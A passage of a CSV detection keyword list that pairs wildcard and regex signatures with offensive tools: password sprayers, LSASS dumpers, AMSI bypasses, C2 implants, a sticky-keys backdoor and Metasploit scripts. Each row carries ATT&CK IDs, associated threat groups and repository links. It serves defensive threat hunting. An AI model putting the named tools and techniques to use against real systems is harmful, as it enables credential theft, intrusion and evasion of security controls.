*",".{0,1000}atomizer\simap\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","34204" "*atomizer lync *",".{0,1000}atomizer\slync\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","34205" "*atomizer owa *",".{0,1000}atomizer\sowa\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","34206" "*atomizer.py -*",".{0,1000}atomizer\.py\s\-.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","34207" "*atomizer.py imap *",".{0,1000}atomizer\.py\simap\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","34208" "*atomizer.py lync *",".{0,1000}atomizer\.py\slync\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","34209" "*atomizer.py owa *",".{0,1000}atomizer\.py\sowa\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","34210" "*AtomLdr.dll*",".{0,1000}AtomLdr\.dll.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","N/A","8","712","91","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z","34211" "*AtomLdr.sln*",".{0,1000}AtomLdr\.sln.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","N/A","8","712","91","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z","34212" "*AtomLdr.vcxproj*",".{0,1000}AtomLdr\.vcxproj.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","N/A","8","712","91","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z","34213" "*AtomLdr-main.zip*",".{0,1000}AtomLdr\-main\.zip.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - 
TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","N/A","8","712","91","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z","34214" "*ATPMiniDump*",".{0,1000}ATPMiniDump.{0,1000}","offensive_tool_keyword","ATPMiniDump","Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis","T1003 - T1005 - T1055 - T1218","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/b4rtik/ATPMiniDump","1","1","N/A","N/A","N/A","3","255","46","2019-12-02T15:01:22Z","2019-11-29T19:49:54Z","34215" "*ATShell (%s@%s)> *",".{0,1000}ATShell\s\(\%s\@\%s\)\>\s.{0,1000}","offensive_tool_keyword","atexec-pro","Fileless atexec for lateral movement","T1021.002 - T1105","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Ridter/atexec-pro","1","0","#content","N/A","10","4","366","45","2024-03-28T03:36:50Z","2024-03-27T09:15:00Z","34216" "*ATT_BITLOCKER_MSFVE_RECOVERY_PASSWORD*ATTm591788*",".{0,1000}ATT_BITLOCKER_MSFVE_RECOVERY_PASSWORD.{0,1000}ATTm591788.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","N/A","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","34217" "*--attack nightmare*",".{0,1000}\-\-attack\snightmare.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation 
tool","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","34218" "*--attack spoolsample*",".{0,1000}\-\-attack\sspoolsample.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","34219" "*Attack_AmsiOpenSession.ps1*",".{0,1000}Attack_AmsiOpenSession\.ps1.{0,1000}","offensive_tool_keyword","Amsi_Bypass","Amsi Bypass payload that works on Windows 11","T1055 - T1055.012 - T1562 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/senzee1984/Amsi_Bypass_In_2023","1","1","N/A","N/A","8","4","377","67","2023-07-30T19:17:23Z","2023-07-30T16:14:19Z","34220" "*Attack_AmsiScanBuffer.ps1*",".{0,1000}Attack_AmsiScanBuffer\.ps1.{0,1000}","offensive_tool_keyword","Amsi_Bypass","Amsi Bypass payload that works on Windows 11","T1055 - T1055.012 - T1562 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/senzee1984/Amsi_Bypass_In_2023","1","1","N/A","N/A","8","4","377","67","2023-07-30T19:17:23Z","2023-07-30T16:14:19Z","34221" "*attacker.shadowCredObjects.Count*",".{0,1000}attacker\.shadowCredObjects\.Count.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","#content","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","34222" "*--attacker-page 
*",".{0,1000}\-\-attacker\-page\s.{0,1000}","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/PrivExchange","1","0","N/A","N/A","N/A","10","1011","173","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z","34223" "*AttackerSetup(windows).exe*",".{0,1000}AttackerSetup\(windows\)\.exe.{0,1000}","offensive_tool_keyword","windows-login-phish","Windows Login Phishing page This is a windows machine login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes","T1566","N/A","N/A","N/A","Phishing","https://github.com/CipherKill/windows-login-phish","1","1","N/A","N/A","N/A","1","17","6","2022-03-25T05:49:01Z","2022-03-13T20:02:15Z","34224" "*AttackerSetup.py*",".{0,1000}AttackerSetup\.py.{0,1000}","offensive_tool_keyword","windows-login-phish","Windows Login Phishing page This is a windows machine login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes","T1566","N/A","N/A","N/A","Phishing","https://github.com/CipherKill/windows-login-phish","1","1","N/A","N/A","N/A","1","17","6","2022-03-25T05:49:01Z","2022-03-13T20:02:15Z","34225" "*AttackerSetup4linux*",".{0,1000}AttackerSetup4linux.{0,1000}","offensive_tool_keyword","windows-login-phish","Windows Login Phishing page This is a windows machine login page designed using HTML CSS and JS. 
This can be used for red teaming or cybersecurity awareness related purposes","T1566","N/A","N/A","N/A","Phishing","https://github.com/CipherKill/windows-login-phish","1","1","#linux","N/A","N/A","1","17","6","2022-03-25T05:49:01Z","2022-03-13T20:02:15Z","34226" "*Attacking domain controller *",".{0,1000}Attacking\sdomain\scontroller\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","34227" "*AttackSurfaceMapper-master*",".{0,1000}AttackSurfaceMapper\-master.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","1","N/A","N/A","6","10","1355","197","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z","34228" "*AttackTeamFamily*-bof-toolset*",".{0,1000}AttackTeamFamily.{0,1000}\-bof\-toolset.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AttackTeamFamily/cobaltstrike-bof-toolset","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","34229" "*Attemping WPAD, LLMNR, and NBTNS poisoning*",".{0,1000}Attemping\sWPAD,\sLLMNR,\sand\sNBTNS\spoisoning.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","34230" "*attempt to randomize script without setting all randomizations methods*",".{0,1000}attempt\sto\srandomize\sscript\swithout\ssetting\sall\srandomizations\smethods.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","34231" "*Attempted to spawn a socks proxy server at 0.0.0.0:*",".{0,1000}Attempted\sto\sspawn\sa\ssocks\sproxy\sserver\sat\s0\.0\.0\.0\:.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some 
builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","34232" "*Attempting connection from 0.0.0.0:*",".{0,1000}Attempting\sconnection\sfrom\s0\.0\.0\.0\:.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","34233" "*Attempting Risky Operation: Opening Handle Directly to Lsass Process*",".{0,1000}Attempting\sRisky\sOperation\:\sOpening\sHandle\sDirectly\sto\sLsass\sProcess.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","34234" "*Attempting to add Sticky Keys backdoor to registry*",".{0,1000}Attempting\sto\sadd\sSticky\sKeys\sbackdoor\sto\sregistry.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","N/A","9","1","34","12","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z","34235" "*Attempting to add Sticky Keys backdoor to registry*",".{0,1000}Attempting\sto\sadd\sSticky\sKeys\sbackdoor\sto\sregistry.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - 
T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","N/A","9","1","34","12","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z","34236" "*AttifyOS*",".{0,1000}AttifyOS.{0,1000}","offensive_tool_keyword","attifyos","AttifyOS is a distro intended to help you perform security assessment and penetration testing of Internet of Things (IoT) devices. It saves you a lot of time by providing a pre-configured environment with all the necessary tools loaded. The new version is based on Ubuntu 18.04 64-Bit - that also means that you'll receive updates for this version till April 2023.","T1559 - T1565 - T1210 - T1189 - T1110","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/adi0x90/attifyos","1","0","N/A","N/A","N/A","10","982","169","2021-08-26T13:31:13Z","2017-07-17T01:40:25Z","34237" "*attrib +r +a +s +h ""%PROGRAMFILES%\Media player"" /S /D*",".{0,1000}attrib\s\+r\s\+a\s\+s\s\+h\s\""\%PROGRAMFILES\%\\Media\splayer\""\s\/S\s\/D.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","34239" "*au.mirrors.cicku.me/blackarch/*/os/*",".{0,1000}au\.mirrors\.cicku\.me\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","34249" "*Auditcleaner.*",".{0,1000}Auditcleaner\..{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers anti forensic - cleans up audit.log","T1055 - 
T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner","1","0","N/A","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z","34251" "*Augustus-main.zip*",".{0,1000}Augustus\-main\.zip.{0,1000}","offensive_tool_keyword","Augustus","Augustus is a Golang loader that executes shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tool","https://github.com/TunnelGRE/Augustus","1","1","N/A","N/A","6","2","131","26","2024-07-27T14:47:45Z","2023-08-21T15:08:40Z","34257" "*ausecwa/bof-registry*",".{0,1000}ausecwa\/bof\-registry.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - 
EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","N/A","10","10","27","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z","34258" "*auth.dev.pico.sh*",".{0,1000}auth\.dev\.pico\.sh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","34260" "*auth/cc2_ssh.*",".{0,1000}auth\/cc2_ssh\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","34261" "*Authenticated returns if the Agent is authenticated to the Merlin server or not*",".{0,1000}Authenticated\sreturns\sif\sthe\sAgent\sis\sauthenticated\sto\sthe\sMerlin\sserver\sor\snot.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - 
TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","34263" "*Author => Hossam Ehab / EDR/AV evasion tool*",".{0,1000}Author\s\=\>\sHossam\sEhab\s\/\sEDR\/AV\sevasion\stool.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","#content","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","34264" "*Author: @haus3c*",".{0,1000}Author\:\s\@haus3c.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","34265" "*Author: @ShitSecure*",".{0,1000}Author\:\s\@ShitSecure.{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","0","N/A","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","34266" "*Author: Hossam Ehab - facebook.com/0xHossam*",".{0,1000}Author\:\sHossam\sEhab\s\-\sfacebook\.com\/0xHossam.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","#content","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","34267" "*Author: Yehuda Smirnov (X: @yudasm_ BlueSky: @yudasm.bsky.social)*",".{0,1000}Author\:\sYehuda\sSmirnov\s\(X\:\s\@yudasm_\sBlueSky\:\s\@yudasm\.bsky\.social\).{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell 
scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","0","#content","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","34268" "*auto_brute.rc*",".{0,1000}auto_brute\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","34269" "*auto_exploit_blank_password*",".{0,1000}auto_exploit_blank_password.{0,1000}","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential 
Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","N/A","4","368","57","2024-05-29T15:07:15Z","2022-08-12T22:16:46Z","34270" "*auto_pass_the_hash.*",".{0,1000}auto_pass_the_hash\..{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","34271" "*auto_pass_the_hash.rc*",".{0,1000}auto_pass_the_hash\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
